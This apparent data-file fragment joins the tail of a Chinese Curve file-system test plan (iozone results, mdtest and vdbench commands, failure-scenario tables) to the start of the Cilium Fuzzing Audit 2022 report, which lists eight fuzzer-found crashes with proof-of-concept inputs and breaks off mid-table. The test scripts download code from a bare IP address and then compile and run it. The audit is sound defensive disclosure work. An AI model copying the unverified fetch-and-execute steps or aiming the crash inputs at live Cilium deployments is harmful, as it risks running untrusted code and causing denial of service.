-F testfile -i 0 -i 1\nInclude close in write timing \n Include fsync in write timing \n File size set to 10485760 kB \n Record Size 1024 kB\n Command line used: iozone -c -e -s 10240M -r 1M -t 1 -F testfile -i 0 -i 1\n Output is in kBytes/sec \n Time Resolution = 0.000001 seconds. \n Processor cache size set to 1024 kBytes. \n Processor cache line size set to 32 bytes. \n File stride size set to 17 * record size. \n Throughput test with 1 process\n Each process writes a 10485760 kByte file in 1024 kByte records \n \n Children see throughput for 1 initial writers = 99574.78 kB/sec\n Parent sees throughput for 1 initial writers = 99574.60 kB/sec\n Min throughput per process = 99574.78 kB/sec\n Max throughput per process = 99574.78 kB/sec\n Avg throughput per process = 99574.78 kB/sec\n Min xfer = 10485760.00 kB \n \n Children see throughput for 1 rewriters = 104966.91 kB/sec© XXX Page 15 of 21 Parent sees throughput for 1 rewriters = 104966.63 kB/sec\n Min throughput per process = 104966.91 kB/sec\n Max throughput per process = 104966.91 kB/sec\n Avg throughput per process = 104966.91 kB/sec\n Min xfer = 10485760.00 kB\n Children see throughput for 1 readers = 183532.78 kB/sec\n Parent sees throughput for 1 readers = 183532.05 kB/sec\n Min throughput per process = 183532.78 kB/sec\n Max throughput per process = 183532.78 kB/sec\n Avg throughput per process = 183532.78 kB/sec\n Min xfer = 10485760.00 kB\n Children see throughput for 1 re-readers = 1674970.38 kB/sec\n Parent sees throughput for 1 re-readers = 1674905.61 kB/sec\n Min throughput per process = 1674970.38 kB/sec\n Max throughput per process = 1674970.38 kB/sec© XXX Page 16 of 21 Avg throughput per process = 1674970.38 kB/sec\n Min xfer = 10485760.00 kB\n5.1.2.3 mdtest\n测试步骤:\n# \nfor i in 4 8 16;do mpirun --allow-run-as-root -np $i mdtest -z 2 -b 3 -I 10000 -d\n/home/nbs/failover/test2/iozone;done\n# \nmpirun --allow-run-as-root -np mdtest -C -F -L -z 4 -b 10 -I 10000 -d /home/nbs/failover/test1 -w 1024\n5.1.2.4 rename 测试用例集\n暂无\n5.1.2.5 xfstest\n测试步骤:© XXX Page 17 of 21#!/bin/sh -x\nset -e\nwget http://59.111.93.102:8080/qa/fsync-tester.c\ngcc -D_GNU_SOURCE fsync-tester.c -o fsync-tester\n./fsync-tester\necho $PATH\nwhereis lsof\nlsof\n5.1.3 数据一致性测试\n5.1.3.1 编译项目或者内核\n测试步骤:© XXX Page 18 of 21# linux \n#!/usr/bin/env bash\nset -e\nwget -O linux.tar.gz http://59.111.93.102:8080/qa/linux-5.4.tar.gz\nsudo apt-get install libelf-dev bc -y\nmkdir t\ncd t\ntar xzf ../linux.tar.gz\ncd linux*\nmake defconfig\nmake -j`grep -c processor /proc/cpuinfo`\ncd ..\nif ! rm -rv linux* ; then\n echo \"uh oh rm -r failed, it left behind:\"\n find .\n exit 1\nfi\ncd ..\nrm -rv t linux*\n5.1.3.2 vdbench读写一致性测试\n测试步骤:\nfsd=fsd1,anchor=/home/nbs/failover/test1,depth=1,width=10,files=10,sizes=(100m,0),shared=yes,openflags=o_direct\nfwd=fwd1,fsd=fsd1,threads=10,xfersize=(512,20,4k,20,64k,20,512k,20,1024k,20),fileio=random,fileselect=random,rdp\nct=50\nrd=rd1,fwd=fwd*,fwdrate=max,format=restart,elapsed=2000000,interval=1\nexec : ./vdbench -f profile -jn\n5.2 异常测试© XXX Page 19 of 21操作 影响\n1个etcd\\mds\\metaserver 网络拔出  \nclient 网络拔出  \nclient节点丢包  \nkill etcd 后重启  \nkill mds 后重启  \nkill metaserver 后重启  \nmetaserver 数据迁出  \n一个metasever掉电  \n丢包10%  \n丢包30%  \n主etcd掉电  \n主mds掉电  \n增加metaserver数据迁入  \n网络延时300ms  \n5.3 新增功能测试\n5.3.1 warmup测试\n5.3.1.1 cto open\n5.3.1.1.1 静态warmup\n参考   中的 fs文件系统/2.4.0版本自测用例/预热数据 http://eq.hz.netease.com//#/useCaseManag/list?projectId=1155&moduleid=9870838\n5.3.1.1.2 同时有读写时warmup© XXX Page 20 of 215.3.1.1.2.1  缓存盘容量不足时\n可以预先在缓存盘里创建一个大文件占据缓存盘容量,人为制造缓存盘容量不足,校验文件md5一致性\n5.3.1.1.2.1.1 大文件(根据缓存盘容量)并发操作\n操作 结论\n挂卸载 fuse  \n其他文件并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup不同文件  \n5.3.1.1.2.1.2  大规模目录(1000w+)\n操作 结论\n挂卸载 fuse  \n其他目录并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup不同目录  \n5.3.1.1.2.2  缓存盘容量足够时\n5.3.1.1.2.2.1 大文件(根据缓存盘容量)并发操作\n操作 结论\n挂卸载 fuse  © XXX Page 21 of 21其他文件并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup不同文件  \n5.3.1.1.2.2.2  大规模目录(1000w+)\n操作 结论\n挂卸载 fuse  \n其他目录并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup不同目录  \n5.4 回归测试\nhttps://github.com/opencurve/curve/issues/1833\nhttps://github.com/opencurve/curve/issues/1841\nhttps://github.com/opencurve/curve/issues/1842\nhttps://github.com/opencurve/curve/issues/1881" } ]
{ "category": "Runtime", "file_name": "CiliumFuzzingAudit2022.pdf", "project_name": "Cilium", "subcategory": "Cloud Native Network" }
[ { "data": "P R E S E N T S \nC i l i u m F u z z i n g A u d i t\nIn collaboration with the Cilium project maintainers and The Linux Foundation\nA u t h o r s\nAdam Korczynski <\nadam@adalogics.com\n>\nDavid Korczynski <\ndavid@adalogics.com\n>\nDate: 13th February, 2023\nThis report is licensed under Creative Commons 4.0 (CC BY 4.0)\n1\nCilium Fuzzing Audit, 2022\nCNCF security and fuzzing audits\nThis report details a fuzzing audit commissioned by the CNCF and the engagement is part\nof the broader efforts carried out by CNCF in securing the so\u0000ware in the CNCF landscape.\nDemonstrating and ensuring the security of these so\u0000ware packages is vital for the CNCF\necosystem and the CNCF continues to use state of the art techniques to secure its projects\nas well as carrying out manual audits. Over the last handful of years, CNCF has been\ninvesting in security audits, fuzzing and so\u0000ware supply chain security that has helped\nproactively discover and fix hundreds of issues.\nFuzzing is a proven technique for finding security and reliability issues in so\u0000ware and the\nefforts so far have enabled fuzzing integration into more than twenty CNCF projects\nthrough a series of dedicated fuzzing audits. In total, more than 350 bugs have been found\nthrough fuzzing of CNCF projects. The fuzzing efforts of CNCF have focused on enabling\ncontinuous fuzzing of projects to ensure continued security analysis, which is done by way\nof the open source fuzzing project OSS-Fuzz\n1\n.\nCNCF continues work in this space and will further increase investment to improve\nsecurity across its projects and community. The focus for future work is integrating fuzzing\ninto more projects, enabling sustainable fuzzer maintenance, increasing maintainer\ninvolvement and enabling fuzzing to find more vulnerabilities in memory safe languages.\nMaintainers who are interested in getting fuzzing integrated into their projects or have\nquestions about fuzzing are encouraged to visit the dedicated cncf-fuzzing repository\nhttps://github.com/cncf/cncf-fuzzing\nwhere questions\nand queries are welcome.\n1\nhttps://github.com/google/oss-fuzz\n2Cilium Fuzzing Audit, 2022\nEx ecutive summary\nIn this engagement, Ada Logics worked on improving Ciliums fuzzing suite. At the time of this\nengagement, Cilium was already integrated into OSS-Fuzz, and the goal of this fuzzing audit was to\nbuild upon this integration and improve the fuzzing efforts in a continuous manner.\nThe fuzzing audit added fuzzers for a lot of data processing APIs that found a number of different\nissues in Cilium and its dependencies. None of the issues were considered critical, however, they\nrevealed some issues in Cilium that prompted rewrites and deprecation of some packages\nthroughout the source tree.\nPrior to this engagement, Ciliums OSS-Fuzz integration was set up in manner where the fuzzers\nand the OSS-Fuzz build script were located in Ciliums own repository\n2\n. In this fuzzing audit, most\ndevelopment of the fuzzers was carried out in the CNCF-Fuzzing repository,\nhttps://github.com/cncf/cncf-fuzzing/tree/main/projects/cilium\n.\nThis allowed the Ada Logics team\nto make smaller iterations of the fuzzers throughout the audit and avoid imposing the overhead of\nhaving the Cilium maintainers review trivial changes to the fuzzers. OSS-Fuzz was instructed to pull\nthe fuzzers from CNCF-Fuzzing in addition to the fuzzers from Ciliums repository.\nR e s u l t s s u m m a r i s e d\n14 fuzzers developed\nAll fuzzers added to Ciliums OSS-Fuzz integration\nAll fuzzers supported by Ciliums CIFuzz integration\n8 crashes were found.\n●\n5 cases of excessive memory allocation\n●\n1 index out of range\n●\n1 time out\n●\n1 nil-dereference\n2\nhttps://github.com/cilium/cilium/blob/master/test/fuzzing/oss-fuzz-build.sh\n3Cilium Fuzzing Audit, 2022\nT able of Contents\nCNCF security and fuzzing audits\n2\nExecutive summary\n3\nTable of Contents\n4\nCilium fuzzing\n5\nIssues found by fuzzers\n9\nRuntime stats\n19\nConclusions and future work\n20\n4Cilium Fuzzing Audit, 2022\nCilium fuzzing\nIn this section we present details on the Cilium fuzzing set up, and in particular the overall\nfuzzing architecture as well as the specific fuzzers developed.\nArchitecture\nA central component in the Cilium approach to fuzzing is continuous fuzzing by way of\nOSS-Fuzz. The Cilium source code and the source code for the Cilium fuzzers are the two\nkey so\u0000ware packages that OSS-Fuzz uses to fuzz Cilium. The following figure gives an\noverview of how OSS-Fuzz uses these two packages and what happens when an issue is\nfound/fixed.\nFigure 1.1: Ciliums fuzzing architecture\nThe current OSS-Fuzz set up builds the fuzzers by cloning the upstream Cilium Github\nrepository to get the latest Cilium source code and the CNCF-Fuzzing Github repository to\nget the latest set of fuzzers, and then builds the fuzzers against the cloned Cilium code. As\nsuch, the fuzzers are always run against the latest Cilium commit.\n5\nCilium Fuzzing Audit, 2022\nThis build cycle happens daily and OSS-Fuzz will verify if any existing bugs have been\nfixed. If OSS-fuzz finds that any bugs have been fixed OSS-Fuzz marks the crashes as fixed\nin the Monorail bug tracker and notifies maintainers.\nIn each fuzzing iteration, OSS-Fuzz uses its corpus accumulated from previous fuzz runs. If\nOSS-Fuzz detects any crashes when running the fuzzers, OSS-Fuzz performs the following\nactions:\n1.\nA detailed crash report is created.\n2.\nAn issue in the Monorail bug tracker is created.\n3.\nAn email is sent to maintainers with links to the report and relevant entry in the\nbug tracker.\nOSS-Fuzz has a 90 day disclosure policy, meaning that a bug becomes public in the bug\ntracker if it has not been fixed. The detailed report is never made public. The Cilium\nmaintainers will fix issues upstream, and OSS-Fuzz will pull the latest Cilium master\nbranch the next time it performs a fuzz run and verify that a given issue has been fixed.\nCilium Fuzzers\nIn this section we present a highlight of the Cilium fuzzers and which parts of Cilium they\ntest. In total, 14 fuzzers were written during the fuzzing audit.\nOverview\n#\nName\nPackage\n1FuzzLabelsfilterPkgcilium/pkg/labelsfilter\n2FuzzDecodeTraceNotifycilium/pkg/monitor\n3FuzzFormatEventcilium/pkg/monitor\n4FuzzPayloadEncodeDecodecilium/pkg/monitor/payload\n5FuzzElfOpencilium/pkg/elf\n6FuzzElfWritecilium/pkg/elf\n7FuzzMatchpatternValidatecilium/pkg/fqdn/matchpattern\n8FuzzMatchpatternValidateWithoutCachecilium/pkg/fqdn/matchpattern\n9FuzzParserDecodecilium/pkg/hubble/parser\n10FuzzLabelsParsecilium/pkg/k8s/slim/k8s/apis/labels\n11FuzzMultipleParserscilium/proxylib/cassandra\n12FuzzConfigParsecilium/pkg/bgp/config\n6Cilium Fuzzing Audit, 2022\n13FuzzNewVisibilityPolicycilium/pkg/policy\n14FuzzBpfcilium/pkg/bpf\nTarget APIs\n1: FuzzLabelsfilterPkg\nTests thatParseLabelPrefixCfg()\nandFilter()\nAPIs\nof thelabelsfilter\npackage.\n2: FuzzDecodeTraceNotify\nPasses an empty&TraceNotify{}\nand a pseudo-random\nbyte slice toDecodeTraceNotify()\n.\n3: FuzzFormatEvent\nCreates a pseudo-random&Payload{}\nand passes it to(m*MonitorFormatter).FormatEvent()\n.\n4: FuzzPayloadEncodeDecode\nDecodes aPayload{}\nwith a pseudo-random byte slice.\n5: FuzzElfOpen\nCreates a file with data provided by the fuzzer and opens it by way ofgithub.com/cilium/cilium/pkg/elf.Open()\n.\n6: FuzzElfWrite\nCreates a new Elf and writes pseudo-random data to it.\n7: FuzzMatchpatternValidate\nPasses a pseudo-random string togithub.com/cilium/cilium/pkg/fqdn/matchpattern.Validate()\n.\n8: FuzzMatchpatternValidateWithoutCache\nPasses a pseudo-random string togithub.com/cilium/cilium/pkg/fqdn/matchpattern.Validate()\n.\n9: FuzzParserDecode\nInstantiates a Hubble parser. It then creates aMonitorEvent\nand assigns either aPerfEvent\n,AgentEvent\nor aLostEvent\nto theMonitorEvent’sPayload\n. Finally the\nfuzzer callsgithub.com/cilium/cilium/pkg/hubble/parser.(p*Parser).Decode()\n, passing theMonitorEvent\n.\n7Cilium Fuzzing Audit, 2022\n10: FuzzLabelsParse\nPasses a pseudo-random string togithub.com/cilium/cilium/pkg/k8s/slim/k8s/apis/labels.Parse()\n.\n11: FuzzMultipleParsers\nStarts a log server, inserts a pseudo-random policy text, creates a new proxylib connection\nand callsOnData()\nagainst the connection. When creating\nthe connection, the fuzzer\nchooses between the Cassandra, Kafka, R2d2 or Memcache parsers.\n12: FuzzConfigParse\nPasses the fuzzing testcase to thebgp\nconfiguration\nparser.\n13: FuzzNewVisibilityPolicy\nCreates aVisibilityPolicy\nusing the fuzz testcase\nas the annotation parameter.\n14: FuzzBpf\nCreates two files, a “bpffFile” and an “elfFile”. Pseudo-random data is written to each file.\nThe fuzzer then calls eitherStartBPFFSMigration()\norFinalizeBPFFSMigration()\n. If it callsFinalizeBPFFSMigration()\nit may set the\nrevert argument to true.\n8Cilium Fuzzing Audit, 2022\nIssues found by fuzzers\nA total of 8 unique crashes were reported during the audit. All crashes were triaged by the\nCilium team who tracked the issues internally. The issues are as follows:\n#\nTitle\nMitigation\n1\nCilium Monitor: Out of memory when decoding \nspecific payload data\nClose: WontFix\n2\nCilium Monitor: index out of range\nClose: WontFix\n3\nCilium Monitor: Out of memory panic\nClose: WontFix\n4\nExcessive processing time required for rules with \nlong DNS namesFuzzPayloadEncodeDecode\nImprove Cilium limits on \nmatchpattern\n5\nExcessive memory allocation when parsing MetalLB \nconfiguration\nDeprecate feature\n6\nExcessive memory usage when loading and writing \nELF file\nAvoid reading/writing ELFs \nas part of datapath load\n7\nExcessive memory consumption when reading bytes \nof bpf_elf_map\nAvoid reading/writing ELFs \nas part of datapath load\n8\nHubble: nil-dereference in three-four parser\nCheck if nil before reading\nIssue 1-3 were closed as WontFixʼes. These were true, reproducible crashes, but triaging\nshowed that they did not have impact on real-world use cases.\nPublic Github issues were created for issue 4, 5 and 6 to fix at a future date.\nIssue 7 and 8 were fixed in Cilium.\n9Cilium Fuzzing Audit, 2022\n1: Cilium Monitor: Out of memory when decoding specific\npayload data\nOSS-Fuzz bug tracker:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49119\nMitigation:\nClose: WontFix\nID:\nADA-CIL-FUZZ-1\nDescription\nA fuzzer found that a well-cra\u0000ed payload data byte slice could cause excessive memory\nconsumption of the host machine.\nOSS-Fuzz took the following steps to trigger the crash. Note that this happened inside the\nOSS-Fuzz environment which has a maximum of 2560Mb memory available:\n1234567891011packagepayload\nimport(\"testing\")\nfuncTestPoC(t *testing.T) {data := []byte{251,0,99,255,255,6}pl := &Payload{}pl.Decode(data)}\nFigure 1.1:Proof of concept payload to trigger issueADA-CIL-FUZZ-1\n… which resulted in allocating 3737Mb of memory that OSS-Fuzz reported as an\nout-of-memory issue:\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n==13== ERROR: libFuzzer: out-of-memory (used: 3336Mb; limit: 2560Mb) \nTo change the out-of-memory limit use -rss_limit_mb=<N>\nLive Heap Allocations: 24124699 bytes in 32 chunks; quarantined: 44415 bytes in 46 chunks; 7488 other chunks; total \nchunks: 7566; showing top 95% (at most 8 unique contexts) \n24120888 byte(s) (99%) in 11 allocation(s) \n#0 0x52ef96 in __interceptor_malloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3 \n#1 0x4ad997 in operator new(unsigned long) cxa_noexception.cpp \n#2 0x458342 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 \n#3 0x7f6e83556082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: \n1878e6b475720c7c51969e69ab2d276fae6d1dee)\nFigure 1.2: Stacktrace from running the test case against the Cilium code base.\nThe function where this issue may be triggered is run from the \"cilium monitor\" command,\nwhich may be invoked inside the Cilium container by a privileged user. Cilium exercises\ncontrol over the generation and processing of these messages, so the likelihood of\nmalformed input is low. The impacted component is not a long-running process so there is\nno expected availability or observability impact. As a consequence of this, the issue will be\nclosed without a fix.\n10Cilium Fuzzing Audit, 2022\n2: Cilium Monitor: index out of range\nOSS-Fuzz bug tracker:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49723\nMitigation:\nClose: WontFix\nID:\nADA-CIL-FUZZ-2\nDescription\nAn index out of range panic in Golangsgob\npackage\nwas triggerable from Ciliums payload\npackage when decoding aPayload\nwith a particularly\nwell-crafted testcase.\nProof of concept\nThe following test reproduces the issue. The key lines are 8 and 10, where line 8 contains\nthe payload and line 10 the entry point that causes the panic. The data produced on line 8\ncorresponds to the data generated by the fuzzer.\n123456789101112packagepayload\nimport(\"testing\")\nfuncTestPoC(t *testing.T) {data := []byte{18,127,255,2,0,248,127,255,255,255,255,255,255,255,255,255,25,67,36}pl := &Payload{}pl.Decode(data)}\nFigure 2.1:Proof of concept payload to trigger issueADA-CIL-FUZZ-2\nTo reproduce the issue the above test can be run against Cilium main branch commitb4794d690b5690d70c074bffd1db7593e3938e65\nby placing\nthe test inside thepkg/monitor/payload\ndirectory:\n1234git clone https://github.com/cilium/ciliumcd ciliumgit checkout b4794d690b5690d70c074bffd1db7593e3938e65cd pkg/monitor/payload\nFigure 2.2: Extracting the relevant commit of Cilium to reproduce ADA-CIL-FUZZ-2\nCreate the test aspoc_test.go\nwith the contents of\nthe test above and then rungo test-run=TestPoC\n. You should get the following stacktrace:\n11Cilium Fuzzing Audit, 2022\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n18\n19\n20\n21\n22\n23\n24\n25\n26\n27\n28\n29\n30\n31\n32\n33\n34\npanic: runtime error: index out of range [-9223372036854775808] [recovered] \npanic: runtime error: index out of range [-9223372036854775808] [recovered] \npanic: runtime error: index out of range [-9223372036854775808]\ngoroutine 19 [running]: \ntesting.tRunner.func1.2({0x653040, 0xc00015e048}) \n/usr/local/go/src/testing/testing.go:1396 +0x24e \ntesting.tRunner.func1() \n/usr/local/go/src/testing/testing.go:1399 +0x39f \npanic({0x653040, 0xc00015e048}) \n/usr/local/go/src/runtime/panic.go:884 +0x212 \nencoding/gob.catchError(0xc00016c1f0) \n/usr/local/go/src/encoding/gob/error.go:38 +0x6d \npanic({0x653040, 0xc00015e048}) \n/usr/local/go/src/runtime/panic.go:884 +0x212 \nencoding/gob.(*Decoder).decodeStruct(0xc00016c180?, 0xc00015c180, {0x655440?, 0xc0001ae0c0?, 0x4ec2ef?}) \n/usr/local/go/src/encoding/gob/decode.go:462 +0x2cc \nencoding/gob.(*Decoder).decodeValue(0xc00016c180, 0x485f0?, {0x62bc00?, 0xc0001ae0c0?, 0xc00016c198?}) \n/usr/local/go/src/encoding/gob/decode.go:1210 +0x24e \nencoding/gob.(*Decoder).recvType(0xc00016c180, 0x40) \n/usr/local/go/src/encoding/gob/decoder.go:67 +0x13c \nencoding/gob.(*Decoder).decodeTypeSequence(0xc00016c180, 0x0) \n/usr/local/go/src/encoding/gob/decoder.go:164 +0x7b \nencoding/gob.(*Decoder).DecodeValue(0xc00016c180, {0x644540?, 0xc000115230?, 0x8?}) \n/usr/local/go/src/encoding/gob/decoder.go:225 +0x18f \nencoding/gob.(*Decoder).Decode(0xc00016c180, {0x644540?, 0xc000115230?}) \n/usr/local/go/src/encoding/gob/decoder.go:202 +0x165 \ngithub.com/cilium/cilium/pkg/monitor/payload.(*Payload).DecodeBinary(...) \n/tmp/cilium/pkg/monitor/payload/monitor_payload.go:98 \ngithub.com/cilium/cilium/pkg/monitor/payload.(*Payload).ReadBinary(0x5007b4?, {0x6bc800?, 0xc000115260?}) \n/tmp/cilium/pkg/monitor/payload/monitor_payload.go:82 +0x3f \ngithub.com/cilium/cilium/pkg/monitor/payload.(*Payload).Decode(...) \n/tmp/cilium/pkg/monitor/payload/monitor_payload.go:65 \ngithub.com/cilium/cilium/pkg/monitor/payload.TestPOC(0x0?) \n/tmp/cilium/pkg/monitor/payload/pl_test.go:10 +0xad\nFigure 2.3: Stacktrace from running the test case against the Cilium code base.\nThis issue has been closed without a fix for the same reasons as ADA-CIL-FUZZ-1.\n12Cilium Fuzzing Audit, 2022\n3: Cilium Monitor: Out of memory panic\nOSS-Fuzz bug tracker\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53070\nMitigation\nClose: WontFix\nID:\nADA-CIL-FUZZ-3\nDescription\nFuzzFormatEvent found a crash when a well-crafted Payload would be passed to(m*MonitorFormatter).FormatEvent()\n.\nThe vulnerable payload json was:{\"Data\":\"gvsB/yAgIA==\",\"CPU\":32,\"Lost\":32,\"Type\":9}\nOSS-Fuzz took the following steps to trigger the crash. Note that this happened inside the\nOSS-Fuzz environment which has a maximum of 2560Mb memory available:\n1234567891011121314151617packagemain\nimport(\"github.com/cilium/cilium/pkg/monitor/format\"\"github.com/cilium/cilium/pkg/monitor/payload\")\nfuncmain() {pl := &payload.Payload{Data: []byte(\"gvsB/yAgIA==\"),CPU:32,Lost:uint64(32),Type:9,}mf := format.NewMonitorFormatter(0,nil)mf.FormatEvent(pl)}\nFigure 3.0: Sample program that triggered the out-of-memory issue,inside the OSS-Fuzz environment\n… which resulted in allocating 3797Mb of memory that OSS-Fuzz reported as an\nout-of-memory issue:\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n==13== ERROR: libFuzzer: out-of-memory (used: 3797Mb; limit: 2560Mb) \nTo change the out-of-memory limit use -rss_limit_mb=<N>\nLive Heap Allocations: 24131934 bytes in 41 chunks; quarantined: 142310 bytes in 56 chunks; 9911 other chunks; total \nchunks: 10008; showing top 95% (at most 8 unique contexts) \n24120824 byte(s) (99%) in 9 allocation(s) \n#0 0x52efb6 in __interceptor_malloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3 \n#1 0x4ad9b7 in operator new(unsigned long) cxa_noexception.cpp \n#2 0x458362 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 \n#3 0x7f92b5028082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: \n1878e6b475720c7c51969e69ab2d276fae6d1dee)\nFigure 3.1: Stack trace reported by OSS-Fuzz\nThis issue has been closed without a fix for the same reasons as ADA-CIL-FUZZ-1 and\nADA-CIL-FUZZ-2.\n13Cilium Fuzzing Audit, 2022\n4: Excessive processing time required for rules with long DNS\nnames\nOSS-Fuzz bug tracker:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49019\nMitigation:\nImprove Cilium limits on matchpattern\nID:\nADA-CIL-FUZZ-4\nDescription\nA fuzzer found that a well-crafted payload passed togithub.com/cilium/cilium/pkg/fqdn/matchpattern.ValidateWithoutCache()\nwould\ncause Cilium to spend excessive time on a single process. The issue was reported by\nOSS-Fuzz as a time-out from spending 61 seconds on a single invocation ofValidateWithoutCache()\n.\nThe time-out happens when Cilium passes the testcase ontoregexp.Compile(TESTCASE)\n.\nCilium does this without checking the length of the input, and a long input string can make\nCilium spend excessive time on a single invocation. To trigger the crash, the fuzzer had\ngenerated a string longer than 70,000 bytes.\nThe issue was triaged by the Cilium team, and an issue has been opened here:\nhttps://github.com/cilium/cilium/issues/21491\nThe input t o this function is first submitted t o the K ubernetes apiser ver and st ored in a Cust om\nResour ce field. This r equir es a high le vel of privileges t o inser t. Furthermor e, Kubernetes typically\nimposes v arious limits on such fields and on the siz e of the entir e resour ce objects, so it is\npossible that it is r ejected befor e it r eaches this point. K ubernetes will only then for ward the\nobject t o Cilium for Cilium t o then pr ocess this object with the code being fuzz ed in this scenario.\nDue t o these mitigating fact ors, the Cilium maintainers do not consider this t o be lik ely to occur\nin a r eal user envir onment. That said, impr ovements can be made in the Cilium tr ee which is why\nthe abo ve Github issue has been cr eated.\n14Cilium Fuzzing Audit, 2022\n5: Excessive memory allocation when parsing MetalLB\nconfiguration\nOSS-Fuzz bug tracker\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n1786\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n3059\nMitigation\nDeprecate feature\nID:\nADA-CIL-FUZZ-5\nDescription\nA fuzzer that tests the 3rd-party metallb config parser found that it is possible to cause\nexcessive memory consumption of the host machine if a well-crafted config file was being\nparsed.\nThe parsing routine failed at 2 different places, one in Cilium itself and one in the 3rd-party\nlibrary handling the parsing.\nThe found issues have prompted a discussion around deprecating MetalLB support instead\nof fixing the issue in the 3rd-party dependency itself:\nhttps://github.com/cilium/cilium/issues/22246\n15Cilium Fuzzing Audit, 2022\n6: Excessive memory usage when loading and writing ELF file\nOSS-Fuzz bug tracker:\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n1731\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n2981\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n3015\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n3066\nMitigation:\nAvoid reading/writing ELFs as part of datapath load\nID:\nADA-CIL-FUZZ-6\nDescription\nA fuzzer that Ciliums reading and writing routines of ELF files could trigger both an\nout-of-memory panics as well as a time-out from excessive processing time on a single elf\nfile. The root cause is an issue in Golang which is well known to the Golang maintainers. In\nGolang, it is not considered a security vulnerability issue in Golang itself due to the intended\nusage of theelf\npackage.\nTo trigger the issue, the fuzzer creates a file containing the test case. It then invokesgithub.com/cilium/cilium/pkg/elf.Open()\nwith the path\nto the created file.Open()\nreads the file and passes the file contents ontogithub.com/cilium/cilium/pkg/elf.NewELF()\nwhich passes\nthe file contents ontodebug/elf.NewFile()\nin the standard library where\nthe crash happens.\nCilium issue:\nhttps://github.com/cilium/cilium/issues/22245\nSignificant local privileges are required to invoke this bug, so this is not considered a security\nconcern by the Cilium core team. The Cilium maintainers have longer term plans to remove\nthis code, and this will be addressed as part of that effort.\n16Cilium Fuzzing Audit, 2022\n7: Excessive memory consumption when reading bytes of\nbpf_elf_map\nOSS-Fuzz bug tracker\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=\n48961\nMitigation\nAvoid reading/writing ELFs as part of datapath load\nID:\nADA-CIL-FUZZ-7\nDescription\ngithub.com/cilium/cilium/pkg/bpf.parseExtra()\nparses\nextra bytes from the end of abpf_elf_map\nstruct. A fuzzer was able to invoke this\nmethod by callingStartBPFFSMigration\nandFinalizeBPFFSMigration\n.\nThe issue was fixed by removing theparseExtra()\napi\naltogether:\nhttps://github.com/cilium/cilium/pull/19159\n.\n17Cilium Fuzzing Audit, 2022\n8: Hubble: nil-dereference in three-four parser\nOSS-Fuzz bug tracker\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=\n48960\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=\n48957\nMitigation\nCheck if nil before reading\nID:\nADA-CIL-FUZZ-8\nDescription\nTwo nil-dereference panics were discovered in the Hubble three-four parser when accessing a field\nof(*Parser).linkGetter\n. At the time of occurrence,\nthe crash would not be triggerable\nthrough any existing code paths of Ciliums and was considered a cosmetic change. The fuzzer\ncreated the parser through Ciliums own constructor and passed\nnil\nfor all getters.\ncilium/pkg/monitor/datapath_debug.go\n254255\n256257caseDbgEncap:returnfmt.Sprintf(\"Encapsulating to node %d (%#x)from seclabel %d\",n.Arg1, n.Arg1, n.Arg2)caseDbgLxcFound:ifname := linkMonitor.Name(n.Arg1)\nFigure 8.1:Point of failure of ADA-CIL-Fuzz-8\ncilium/pkg/monitor/datapath_debug.go\n664665666667668669returnnil}\n// if the interface is not found, `name` will be an empty string and thus// omitted in the protobuf messagename, _ := p.linkGetter.GetIfNameCached(int(ifIndex))\nFigure 8.2:Point of failure of ADA-CIL-Fuzz-8\nFix:\nhttps://github.com/cilium/cilium/pull/20446\n18Cilium Fuzzing Audit, 2022\nRuntime stats\nContinuity is an important element in fuzzing because fuzzers incrementally build up a\ncorpus over time, therefore, the size of the corpus is a reflection of how much code the\nfuzzer has explored. OSS-Fuzz prioritises running fuzzers that continue to explore more\ncode, and the CPU time presented by OSS-Fuzz runtime stats is thus a reflection of how\nmuch work the fuzzers have performed. The following tables lists for each fuzzer\n3\nthe\namounts of tests executed as well as the total CPU hours devoted:\nName\nTotal times executed\nTotal runtime 